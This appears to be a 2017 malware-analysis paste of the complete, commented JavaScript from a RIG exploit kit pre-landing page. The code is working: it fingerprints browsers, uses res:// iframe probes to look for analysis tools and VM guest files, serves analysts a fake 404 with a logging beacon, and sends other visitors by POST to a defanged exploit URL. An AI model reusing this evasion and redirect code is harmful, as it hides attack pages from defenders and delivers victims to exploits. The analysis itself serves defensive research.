MalwareBreakdown

Commented JavaScript from RIG's pre-landing page

Mar 7th, 2017
  <!DOCTYPE html>
  <html lang="en">
  <head>
  <title></title>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=EDGE">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  </head>
  <body>
  <!-- Hidden about:blank iframe. Its onload string schedules go() after 99 ms (string argument to
       setTimeout is evaluated as code), and the same frame is reused later as window.frames[0]
       to submit the POST form that forwards accepted visitors to NormalURL. -->
  <iframe onload="window.setTimeout('go()', 99)" src="about:blank" style="visibility:hidden"></iframe>
  <script>
  // Exploit-kit landing URL (defanged in this paste); accepted visitors are POSTed to it.
  var NormalURL = 'http://try[.]WERREW[.]INFO/?oq=m3Wp_YrLbNVNVDhiECBclBhnYlZW1NHovv9h0jUzR6fhMHQ-UHbUTp1u9CQUbI&q=wXjQMvXcJwDQCobGMvrESLtNNknQA0KK2Iv2_dqyEoH9cmnihNzUSkrx6B2aC';
  // Fingerprint summary; it is appended to by getBrowser()/finishChecking() and leaked in the
  // /log.php?info= beacon when a visitor is rejected.
  var InfoStr = '';
  // Shared state for the iframe probes. foundAppsCounter is never used in this listing;
  // iFrameObject is assigned in go() but never read.
  var appPaths,foundObjects,appsCount,framesLoaded,foundAppsCounter,iFrameObject;
  // Prefix for the probe iframes' id/name ('myFrame0', 'myFrame1', ...).
  var iFrameName = 'myFrame';
  // deb() only logs when this is true; it is off in the live sample.
  var debug = false;
  // Becomes non-zero once finishChecking() has run; go() tests it right after creating the probes.
  var isChecked = 0;

  // appPaths is declared a second time here; with var hoisting that is harmless. genPaths() is a
  // function declaration (also hoisted), so calling it before its definition below works.
  var appPaths = genPaths();


  // Browser fingerprint. Derives the browser name from the User-Agent string, then (for desktop
  // visitors claiming IE, Chrome or Firefox only) derives it again from feature detection and
  // flags a mismatch as is_bot — i.e. a spoofed User-Agent such as a crawler or analysis sandbox.
  // Any other platform/browser keeps browser_real == '' and is_bot == false.
  // Side effect: appends a summary of the result to the global InfoStr.
  // Returns the browsrObj record.
  function getBrowser() {
    var ua = navigator.userAgent;

    var browsrObj = {
      browser: 'unknown',      // name derived from the UA string
      browser_real: '',        // name derived from feature detection (desktop IE/Chrome/Firefox only)
      is_bot: false,           // true when browser != browser_real
      browser_quality: 0,      // number of feature hits supporting browser_real
      platform: 'desktop',
      versionFull: '',
      versionShort: ''
    };

    // Any exception thrown while parsing the UA is swallowed by the empty catch below.
    try{

      // IIFE: first matching UA token wins, so the order matters (Edge before Chrome, etc.).
      var bName = function () {
        if (ua.search(/Edge/) > -1) return "edge";
        if ((ua.search(/MSIE/) > -1) || (ua.search(/Trident/) > -1)) return "ie";
        if (ua.search(/Firefox/) > -1) return "firefox";
        if ((ua.search(/Opera/) > -1) || (ua.search(/OPR/) > -1)) return "opera";
        if (ua.search(/YaBrowser/) > -1) return "yabrowser";
        if (ua.search(/Chrome/) > -1) return "chrome";
        if (ua.search(/Safari/) > -1) return "safari";
        if (ua.search(/Maxthon/) > -1) return "maxthon";
        else return "unknown";
      }();

      browsrObj.browser = bName;

      // Mobile UA tokens: mobile visitors are excluded from the feature cross-check below.
      if(/iphone|ipad|ipod|android|blackberry|mini|windows\sce|palm/i.test(navigator.userAgent.toLowerCase())) browsrObj.platform = 'mobile';

      var version;
      if(bName != 'unknown')
      {
        switch (bName) {
          case "edge":
            version = (ua.split("Edge")[1]).split("/")[1];
            break;
          case "ie":
            // IE11 carries "Trident/... rv:11.0"; older IE carries "MSIE <version>;".
            if((ua.search(/Trident/) > -1))
            {
              version = (ua.split("; rv:")[1]).split(")")[0];
            }
            else
            {
              version = (ua.split("MSIE ")[1]).split(";")[0];
            }
            break;
          case "firefox":
            version = ua.split("Firefox/")[1];
            break;
          case "opera":
            version = ua.split("Version/")[1];
            break;
          // Unreachable: the IIFE above never returns "operaWebkit".
          case "operaWebkit":
            bName = "opera";
            version = ua.split("OPR/")[1];
            break;
          case "yabrowser":
            version = (ua.split("YaBrowser/")[1]).split(" ")[0];
            break;
          case "chrome":
            version = (ua.split("Chrome/")[1]).split(" ")[0];
            break;
          case "safari":
            version = (ua.split("Version/")[1]).split(" ")[0];
            break;
          case "maxthon":
            version = ua.split("Maxthon/")[1];
            break;

        }

        // If the expected marker is absent, version is undefined and the .split() below throws;
        // the catch swallows it and versionFull/versionShort stay ''.
        browsrObj.versionFull = version;
        browsrObj.versionShort = version.split(".")[0];
      }

    } catch (err) {}


    var w=window,d=document;
    var CorrectBrowser = true;   // unused
    var uaBrowser = browsrObj;   // alias of the same object, not a copy
    // Only isIE is declared with var; isChrome, isFirefox and isOpera become implicit globals.
    var isIE = isChrome = isFirefox = isOpera = 0;

    // Feature-detect the real engine, but only for desktop visitors that claim IE, Chrome or Firefox.
    if(uaBrowser.platform != 'mobile' && (browsrObj.browser == 'ie' || browsrObj.browser == 'chrome' || browsrObj.browser == 'firefox'))
    {
      if('ActiveXObject' in window) isIE++;
      if('chrome' in window) isChrome++;
      if('opera' in window) isOpera++;   // counted but never used afterwards

      if('getBoxObjectFor' in d || 'mozInnerScreenX' in w) isFirefox++;

      // Chrome needs a second hit from one of the WebKit-prefixed globals (see isChrome > 1 below).
      if('WebKitCSSMatrix' in w||'WebKitPoint' in w||'webkitStorageInfo' in w||'webkitURL' in w) isChrome++;


      // Bitmask of HTML5-era features; 0 means none of them is present.
      var f=0;
      f|='sandbox' in d.createElement('iframe')?1:0;
      f|='WebSocket' in w?2:0;
      f|=w.Worker?4:0;
      f|=w.applicationCache?8:0;
      f|=w.history && history.pushState?16:0;
      f|=d.documentElement.webkitRequestFullScreen?32:0;
      f|='FileReader' in w?64:0;


      // No modern features at all is taken as further evidence of (old) IE.
      if(f==0) isIE++;

      // Resolve browser_real from the counters. The blocks are not mutually exclusive, so a later
      // one overwrites an earlier one (e.g. isIE > 0 plus isFirefox > 0 with isChrome == 0 ends as 'firefox').
      if(isIE > 0)
      {
        browsrObj.browser_real = 'ie';
        browsrObj.browser_quality = isIE;
      }
      if(isChrome > 1 && isFirefox == 0)
      {
        browsrObj.browser_real = 'chrome';
        browsrObj.browser_quality = isChrome;
      }
      if(isFirefox > 0 && isChrome == 0)
      {
        browsrObj.browser_real = 'firefox';
        browsrObj.browser_quality = isFirefox;
      }

      // UA claim and feature detection disagree -> treated as a bot (spoofed User-Agent).
      if(uaBrowser.browser != uaBrowser.browser_real) browsrObj.is_bot = true;
    }

    // Fingerprint summary, e.g. 'chrome-chrome_ie0chrome2firefox0'; later sent to /log.php?info=.
    InfoStr += browsrObj.browser+'-'+browsrObj.browser_real+'_ie'+isIE+'chrome'+isChrome+'firefox'+isFirefox;

    return browsrObj;
  }

  //////////////////////////////////////////////// ANALYST NOTE: THE PRE-FILTER (ANTI-ANALYSIS) CHECKS APPEAR TO START HERE ////////////////////////////////////////////////
  // Debug helper: logs o to the console only when the global debug flag is true;
  // otherwise returns false and logs nothing. debug is false in this sample, so deb() is a no-op.
  function deb(o) {
    if (!debug) return false;
    console.log(o);
  }

  // Called from createiFrame(), objectCheckState(), countFrameLoaded() and go().
  // Returns the Internet Explorer version parsed from the UA as a float, or -1 for anything
  // that is not IE. The result selects the IE11-specific code paths in the probe functions.
  function getInternetExplorerVersion() {
    var rv = -1;

    if (navigator.appName == 'Microsoft Internet Explorer') {
      var ua = navigator.userAgent;
      // Pre-IE11 UA strings carry "MSIE <version>". Inside a string literal "\." is just ".",
      // so the character class is [.0-9]; harmless here.
      var re = new RegExp("MSIE ([0-9]{1,}[\.0-9]{0,})");
      if (re.exec(ua) != null)
        // RegExp.$1 is the legacy static capture left by the exec() just above.
        rv = parseFloat( RegExp.$1 );
    } else if (navigator.appName == 'Netscape') {
      // IE11 reports appName 'Netscape' and is matched by the "Trident/... rv:<version>" pattern;
      // other browsers with appName 'Netscape' lack the Trident token and keep rv == -1.
      var ua = navigator.userAgent;
      var re = new RegExp("Trident/.*rv:([0-9]{1,}[\.0-9]{0,})");
      if (re.exec(ua) != null)
        rv = parseFloat( RegExp.$1 );
    }
    return rv;
  }

  // Called from go() once per entry of appPaths. Creates a 1x1 iframe named iFrameName+c whose src
  // is that entry's res:// probe URL, and hooks readystatechange/load so the frame's state
  // transitions can be counted by objectCheckState() and evaluated by countFrameLoaded().
  function createiFrame(c){
    var d=document.createElement('iframe');
    // id and name are both 'myFrame'+c (e.g. 'myFrame0'); objectCheckState() looks the frame up by
    // id and finishChecking() removes it by id afterwards.
    d.setAttribute('id',iFrameName+c);
    d.setAttribute('name',iFrameName+c);
    // Keep the probe frame effectively invisible. (The missing ';' on the first line relies on ASI.)
    d.style['width']='1px'
    d.style['height']='1px';

    // Closures that forward the frame index to the two counters.
    function zrs(){objectCheckState(c);}

    function zlo(){countFrameLoaded(c);}

    if (getInternetExplorerVersion()==11) {
      // IE11: handlers are installed as attribute strings, so c is passed as a string ('0', '1', ...);
      // appPaths['0'] and appPaths[0] resolve to the same element.
      d.setAttribute('onReadyStateChange',"objectCheckState('"+c+"')");
      d.setAttribute('onLoad',"countFrameLoaded('"+c+"')");
    } else {
      // Everything else: addEventListener, with the legacy attachEvent fallback for old IE.
      if(d['addEventListener']){
        d['addEventListener']('readystatechange',zrs,false);
        d['addEventListener']('load',zlo,false);
      } else {
        if(d['attachEvent']){
          d['attachEvent']('on'+'readystatechange',zrs);
          d['attachEvent']('on'+'load',zlo);
        }
      }
    }

    // The src is the 'res' URL built by genPaths(): res://<local file path><resource selector>.
    // Setting it starts the probe; the handlers above observe how the load proceeds.
    d.setAttribute('src',appPaths[c]['res']);
    document.body.appendChild(d);
  }

  // readystatechange handler for probe frame c (wired up in createiFrame).
  // On IE11, appPaths[c]['stateIterate'] counts how many readystatechange events the frame has
  // fired. For every browser (so IE11 does both) it also counts, per readyState value, how often
  // that state was observed — appPaths[c]['loading'], ['interactive'], ['complete'], ...
  // countFrameLoaded() reads these counters to decide whether the probed file exists.
  function objectCheckState(c){
    if (getInternetExplorerVersion()==11) {
      // First event initialises the counter; later events increment it.
      if (!appPaths[c]['stateIterate'])
        appPaths[c]['stateIterate']=1;
      else appPaths[c]['stateIterate']++;
    }

    // Keyed by the frame element's own readyState string. NOTE(review): in browsers whose iframe
    // element has no readyState property, rs is undefined and the key becomes 'undefined' — verify.
    var rs = document.getElementById(iFrameName+c).readyState;
    if (!appPaths[c][rs])
      appPaths[c][rs]=1;
    else appPaths[c][rs]++;
  }

  // load handler for probe frame c (wired up in createiFrame). Decides whether the probed local
  // file counts as present, then fires finishChecking() once every probe frame has loaded.
  function countFrameLoaded(c){
    var _cfl_appName=appPaths[c]['name'];
    var _cfl_appType=appPaths[c]['type'];   // unused

    // "File present" signal: readyState 'interactive' observed more than once, or on IE11 exactly one
    // readystatechange event. Presumably the res:// load produces a different event sequence when
    // the referenced file does not exist — that difference is the side channel; confirm against a
    // live IE11 trace before relying on the exact thresholds.
    if(appPaths[c]['interactive']>1 || (appPaths[c]['stateIterate']==1 && getInternetExplorerVersion()==11)){
      // Record the application name (tool or VM product) as found.
      foundObjects.push(_cfl_appName);
    } else {
    };

    framesLoaded++;

    // All probes have answered -> evaluate the result.
    if (framesLoaded==appsCount) {
      finishChecking();
    }
  }

  // Called from countFrameLoaded() once every probe frame has loaded. Combines the browser
  // fingerprint with the probe results and either serves a spoofed 404 page (carrying a logging
  // beacon) or forwards the visitor to NormalURL. Takes no arguments.
  function finishChecking() {
    // BrowserInfo, dopStr and i are assigned without var and so become implicit globals.
    BrowserInfo = getBrowser();
    // Marks that the full check ran; go() tests this flag right after creating the frames.
    isChecked++;

    // Any detected tool/VM artefact tags the fingerprint with 'VM'. The loop body that would have
    // appended each name is commented out, so exactly one 'VM' is appended to InfoStr no matter how
    // many objects were found.
    if (foundObjects.length>0) {
      dopStr = 'VM';
      for (i in foundObjects) {
        //dopStr = dopStr+'_'+foundObjects[i];
      }
      InfoStr =InfoStr+dopStr;
    }

    // Rejected visitors (UA/feature mismatch or at least one artefact found) get a fake Apache 404.
    // The 10x10 iframe inside it beacons InfoStr to /log.php?info= — a useful detection artefact,
    // since a genuine 404 body would not embed such a request.
    if(BrowserInfo.is_bot == true || foundObjects.length>0) {
      document.write('<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.2.22 (Debian) Server Port 80</address><iframe src="/log.php?info='+InfoStr+'" width=10 height=10></iframe></body></html>');
    } else {
      // Accepted visitors: a form is injected into the hidden about:blank iframe (frames[0]) and
      // submitted with target="_parent", so the top document navigates to NormalURL via POST.
      window.frames[0].document.body.innerHTML = '<form target="_parent" method="post" action="'+NormalURL+'"></form>'; window.frames[0].document.forms[0].submit();
    }

    // Remove the probe frames 'myFrame0'..'myFrame{appsCount-1}'. NOTE(review): on the rejected path,
    // document.write() above has already replaced the document, so the lookup in deleteiFrame() would
    // presumably return null and throw — confirm.
    var b=0;
    for(b=0;b<appsCount;b++){
      deleteiFrame('myFrame'+b);
    }
  }

  // Called from finishChecking(). Removes the element with id c from its parent.
  // Throws a TypeError if no element with that id exists (d is null).
  function deleteiFrame(c) {
    var d=document.getElementById(c);
    d.parentNode.removeChild(d);
  }

  // Called once at load to populate appPaths. Builds the list of res:// probe URLs that point at
  // files of analysis tools and VM guest additions on the visitor's disk; each list entry keeps the
  // original name/type so countFrameLoaded() can report what was found.
  function genPaths() {

    // Base directories. Note path_sys32 carries no drive letter, unlike the two Program Files paths.
    var path_sys32 = '\\Windows\\System32\\drivers\\',
        path_pf = 'C:\\Program Files\\',
        path_pfx86 = 'C:\\Program Files (x86)\\';

    // Probe table. 'res' is the file path below the base dir, 'resident' is the suffix appended to
    // the res:// URL (it looks like the res: protocol's /type/id resource selector — confirm),
    // 'type' is the category (tool / av / vm) and 'filetype' selects the base dir(s).
    // The two AV entries are commented out in this sample; only tools and VM artefacts are probed.
    var appPath = [
      {name:'Fiddler2',resident:'/#24/1',res:'Fiddler2\\Fiddler.exe',type:'tool',filetype:'pf'},
      {name:'Fiddler2',resident:'/#24/1',res:'Fiddler2\\uninst.exe',type:'tool',filetype:'pf'},
      {name:'FFDec',resident:'/#24/1',res:'FFDec\\Uninstall.exe',type:'tool',filetype:'pf'},

      /* the two AV signatures are commented out in the sample as captured
      {name:'NOD32',resident:'/#24/1',res:'ESET\\ESET NOD32 Antivirus\\egui.exe',type:'av',filetype:'pf'},
      {name:'Bitdefender',resident:'/#24/1',res:'Bitdefender Agent\\ProductAgentService.exe',type:'av',filetype:'pf'},
      */

      {name:'VirtualBox',resident:'/#24/#1',res:'Oracle\\VirtualBox Guest Additions\\uninst.exe', type:'vm',filetype:'pf'},
      {name:'VMware',resident:'/#16/#1',res:'VMware\\VMware Tools\\TPAutoConnSvc.exe',type:'vm',filetype:'pf'},
      {name:'VMware',resident:'/#24/2',res:'VMware\\VMware Tools\\VMToolsHook.dll',type:'vm',filetype:'pf'}
    ];

    // Expanded probe list returned to the caller.
    var appPathsCompilled = [];

    for(var i=0;i<appPath.length;i++) {
      // Dead branch in this sample: no entry has filetype 'driver' (it would probe <res>.sys under drivers\).
      if (appPath[i]['filetype']=='driver') {
        appPathsCompilled.push({name:appPath[i]['name'],res:'res://' + path_sys32 + appPath[i]['res'] + '.sys' + appPath[i]['resident'], resident:appPath[i]['resident'], type:appPath[i]['type'],filetype:appPath[i]['filetype']});
      }

      // Every active entry is 'pf': it is expanded to two probes, Program Files (x86) first, then
      // Program Files. With 6 active entries this yields 12 probes.
      if (appPath[i]['filetype']=='pf') {
        appPathsCompilled.push({name:appPath[i]['name'],res:'res://' + path_pfx86 + appPath[i]['res'] + appPath[i]['resident'], resident:appPath[i]['resident'], type:appPath[i]['type'],filetype:appPath[i]['filetype']});
        appPathsCompilled.push({name:appPath[i]['name'],res:'res://' + path_pf + appPath[i]['res'] + appPath[i]['resident'], resident:appPath[i]['resident'], type:appPath[i]['type'],filetype:appPath[i]['filetype']});
      }
    }

    return appPathsCompilled;
  }

  // Entry point, scheduled by the hidden iframe's onload (setTimeout('go()', 99)). Creates one probe
  // frame per appPaths entry, then immediately makes a first accept/reject decision based on the
  // User-Agent cross-check alone.
  function go() {
    foundObjects=[];

    // genPaths() expands each of the 6 active entries into an x86 and a non-x86 probe, so 12 here.
    appsCount=appPaths.length;

    framesLoaded=0;

    // Assigned an empty object (not an array); nothing in this listing reads it afterwards.
    iFrameObject={};


    for(var c=0;c<appsCount;c++) {
      // Only logs (and only when debug is true); createiFrame(c) is called regardless of the check.
      if (typeof appPaths[c] == 'undefined') deb('IS UNDEFINED '+c);
      createiFrame(c);
    }

    // The frames' load/readystatechange events fire asynchronously, so isChecked is presumably still 0
    // here (0 == false is true) and this branch is the normal path; finishChecking() then runs later,
    // if the probes finish before the page navigates away — confirm.
    if(isChecked == false) {
      BrowserInfo = getBrowser();
      // UA/feature mismatch: spoofed Apache 404 whose iframe beacons InfoStr+'NOchecked' to /log.php?info=.
      if(BrowserInfo.is_bot == true) {
        document.write('<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.2.22 (Debian) Server Port 80</address><iframe src="/log.php?info='+InfoStr+'NOchecked" width=10 height=10></iframe></body></html>');
      }
      // Otherwise forward to NormalURL via the hidden iframe's POST form, exactly as finishChecking() does.
      // The commented-out document.write below would instead have served the 404 page and beaconed
      // 'NOcheckedNOBOT' plus the IE version; it is inactive in this sample.
      else {
        window.frames[0].document.body.innerHTML = '<form target="_parent" method="post" action="'+NormalURL+'"></form>'; window.frames[0].document.forms[0].submit();
        //document.write('<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.2.22 (Debian) Server Port 80</address><iframe src="log.php?info='+InfoStr+'NOcheckedNOBOT'+getInternetExplorerVersion()+'" width=10 height=10></iframe></body></html>');
      }
    }
  }

  </script>